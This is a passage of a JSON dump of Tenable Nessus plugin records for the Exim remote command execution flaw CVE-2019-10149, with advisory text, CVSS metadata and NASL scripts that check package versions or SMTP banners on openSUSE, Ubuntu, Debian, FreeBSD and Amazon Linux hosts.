value:\"p-cpe:/a:novell:opensuse:eximon-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:eximstats-html\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.1\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.1\", reference:\"exim-4.88-lp151.4.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"exim-debuginfo-4.88-lp151.4.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"exim-debugsource-4.88-lp151.4.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"eximon-4.88-lp151.4.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"eximon-debuginfo-4.88-lp151.4.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"eximstats-html-4.88-lp151.4.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exim / exim-debuginfo / exim-debugsource / eximon / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:24:15", "description": "It was discovered that Exim incorrectly handled certain decoding operations. A remote attacker could possibly use this issue to execute arbitrary commands.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2019-06-07T00:00:00", "type": "nessus", "title": "Ubuntu 18.04 LTS / 18.10 : exim4 vulnerability (USN-4010-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-10149"], "modified": "2023-05-11T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:exim4-daemon-heavy", "p-cpe:/a:canonical:ubuntu_linux:exim4-daemon-light", "cpe:/o:canonical:ubuntu_linux:18.04:-:lts", "cpe:/o:canonical:ubuntu_linux:18.10"], "id": "UBUNTU_USN-4010-1.NASL", "href": "https://www.tenable.com/plugins/nessus/125770", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-4010-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(125770);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/11\");\n\n script_cve_id(\"CVE-2019-10149\");\n script_xref(name:\"USN\", value:\"4010-1\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/10\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0413\");\n\n script_name(english:\"Ubuntu 18.04 LTS / 18.10 : exim4 vulnerability (USN-4010-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"It was discovered that Exim incorrectly handled certain decoding\noperations. A remote attacker could possibly use this issue to execute\narbitrary commands.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/4010-1/\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Update the affected exim4-daemon-heavy and / or exim4-daemon-light\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-10149\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim 4.87 - 4.91 Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-daemon-heavy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-daemon-light\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/06/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/06/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/06/07\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2019-2023 Canonical, Inc. / NASL script (C) 2019-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(18\\.04|18\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 18.04 / 18.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nvar flag = 0;\n\nif (ubuntu_check(osver:\"18.04\", pkgname:\"exim4-daemon-heavy\", pkgver:\"4.90.1-1ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"exim4-daemon-light\", pkgver:\"4.90.1-1ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"exim4-daemon-heavy\", pkgver:\"4.91-6ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"exim4-daemon-light\", pkgver:\"4.91-6ubuntu1.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exim4-daemon-heavy / exim4-daemon-light\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:24:48", "description": "According to its banner, the version of Exim running on the remote host is between 4.87 and 4.91 (inclusive). It is, therefore, potentially affected by a remote command execution vulnerability. A flaw exists in the deliver_message() function that could allow an attacker to execute arbitrary commands via a specially crafted email.", "cvss3": {}, "published": "2019-06-06T00:00:00", "type": "nessus", "title": "Exim 4.87 < 4.92 Remote Command Execution", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-10149"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:exim:exim"], "id": "EXIM_4_92.NASL", "href": "https://www.tenable.com/plugins/nessus/125737", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(125737);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2019-10149\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/10\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0413\");\n\n script_name(english:\"Exim 4.87 < 4.92 Remote Command Execution\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote mail server is potentially affected by a remote command \nexecution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of Exim running on the remote\nhost is between 4.87 and 4.91 (inclusive). It is, therefore, potentially \naffected by a remote command execution vulnerability. A flaw exists\nin the deliver_message() function that could allow an attacker to execute\narbitrary commands via a specially crafted email.\");\n # https://www.tenable.com/blog/cve-2019-10149-critical-remote-command-execution-vulnerability-discovered-in-exim\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?16a2ac7f\");\n # https://www.openwall.com/lists/oss-security/2019/06/05/4\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9de8f07f\");\n # https://www.openwall.com/lists/oss-security/2019/06/06/1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?cf324cac\");\n script_set_attribute(attribute:\"see_also\", value:\"https://exim.org/static/doc/security/CVE-2019-10149.txt\");\n script_set_attribute(attribute:\"see_also\", value:\"ftp://ftp.exim.org/pub/exim/exim4/ChangeLog\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Exim 4.92 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-10149\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim 4.87 - 4.91 Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/06/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/02/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/06/06\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:exim:exim\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SMTP problems\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smtpserver_detect.nasl\");\n script_require_keys(\"Settings/ParanoidReport\");\n script_require_ports(\"Services/smtp\", 25);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smtp_func.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nport = get_service(svc:\"smtp\", default:25, exit_on_fail:TRUE);\n\nbanner = get_smtp_banner(port:port);\nif (!banner) audit(AUDIT_NO_BANNER, port);\nif (\"Exim\" >!< banner) audit(AUDIT_NOT_LISTEN, 'Exim', port);\n\nmatches = pregmatch(pattern:\"220.*Exim ([0-9\\._]+)\", string:banner);\nif (isnull(matches)) audit(AUDIT_SERVICE_VER_FAIL, 'Exim', port);\n\nversion = matches[1];\n# Underscore was added to the vesion\nversion = ereg_replace(string:version, pattern:'_', replace:'.');\n\nif (ver_compare(minver:'4.87', ver:version, fix:'4.92', strict:FALSE) < 0)\n{\n report =\n '\\n Banner : ' + banner +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 4.92';\n\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, 'Exim', port, version);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-25T14:25:59", "description": "The Qualys Research Labs reported a flaw in Exim, a mail transport agent. Improper validation of the recipient address in the deliver_message() function may result in the execution of arbitrary commands.", "cvss3": {}, "published": "2019-06-07T00:00:00", "type": "nessus", "title": "Debian DSA-4456-1 : exim4 - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-10149"], "modified": "2022-12-06T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:exim4", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DSA-4456.NASL", "href": "https://www.tenable.com/plugins/nessus/125742", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4456. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(125742);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2019-10149\");\n script_xref(name:\"DSA\", value:\"4456\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/10\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0413\");\n\n script_name(english:\"Debian DSA-4456-1 : exim4 - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The Qualys Research Labs reported a flaw in Exim, a mail transport\nagent. Improper validation of the recipient address in the\ndeliver_message() function may result in the execution of arbitrary\ncommands.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/exim4\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/exim4\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2019/dsa-4456\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade the exim4 packages.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 4.89-2+deb9u4.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-10149\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim 4.87 - 4.91 Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/06/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/06/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/06/07\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"exim4\", reference:\"4.89-2+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-base\", reference:\"4.89-2+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-config\", reference:\"4.89-2+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-daemon-heavy\", reference:\"4.89-2+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-daemon-heavy-dbg\", reference:\"4.89-2+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-daemon-light\", reference:\"4.89-2+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-daemon-light-dbg\", reference:\"4.89-2+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-dbg\", reference:\"4.89-2+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-dev\", reference:\"4.89-2+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"eximon4\", reference:\"4.89-2+deb9u4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:24:55", "description": "Exim team and Qualys report :\n\nWe received a report of a possible remote exploit. Currently there is no evidence of an active use of this exploit.\n\nA patch exists already, is being tested, and backported to all versions we released since (and including) 4.87.\n\nThe severity depends on your configuration. It depends on how close to the standard configuration your Exim runtime configuration is. The closer the better.\n\nExim 4.92 is not vulnerable.", "cvss3": {}, "published": "2019-06-07T00:00:00", "type": "nessus", "title": "FreeBSD : Exim -- RCE in deliver_message() function (45bea6b5-8855-11e9-8d41-97657151f8c2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-10149"], "modified": "2022-12-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:exim", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_45BEA6B5885511E98D4197657151F8C2.NASL", "href": "https://www.tenable.com/plugins/nessus/125749", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2022 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(125749);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2019-10149\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/10\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0413\");\n\n script_name(english:\"FreeBSD : Exim -- RCE in deliver_message() function (45bea6b5-8855-11e9-8d41-97657151f8c2)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Exim team and Qualys report :\n\nWe received a report of a possible remote exploit. Currently there is\nno evidence of an active use of this exploit.\n\nA patch exists already, is being tested, and backported to all\nversions we released since (and including) 4.87.\n\nThe severity depends on your configuration. It depends on how close to\nthe standard configuration your Exim runtime configuration is. The\ncloser the better.\n\nExim 4.92 is not vulnerable.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.exim.org/static/doc/security/CVE-2019-10149.txt\"\n );\n # https://vuxml.freebsd.org/freebsd/45bea6b5-8855-11e9-8d41-97657151f8c2.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?48eb73b3\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-10149\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim 4.87 - 4.91 Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/05/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/06/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/06/07\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"exim>=4.87<4.92\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-25T14:25:59", "description": "A flaw was found in Exim versions 4.87 to 4.91 before release 1.20 (inclusive). Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to remote command execution. (CVE-2019-10149)", "cvss3": {}, "published": "2019-06-07T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : exim (ALAS-2019-1221)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-10149"], "modified": "2022-12-06T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:exim", "p-cpe:/a:amazon:linux:exim-debuginfo", "p-cpe:/a:amazon:linux:exim-greylist", "p-cpe:/a:amazon:linux:exim-mon", "p-cpe:/a:amazon:linux:exim-mysql", "p-cpe:/a:amazon:linux:exim-pgsql", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2019-1221.NASL", "href": "https://www.tenable.com/plugins/nessus/125739", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2019-1221.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(125739);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2019-10149\");\n script_xref(name:\"ALAS\", value:\"2019-1221\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/10\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", 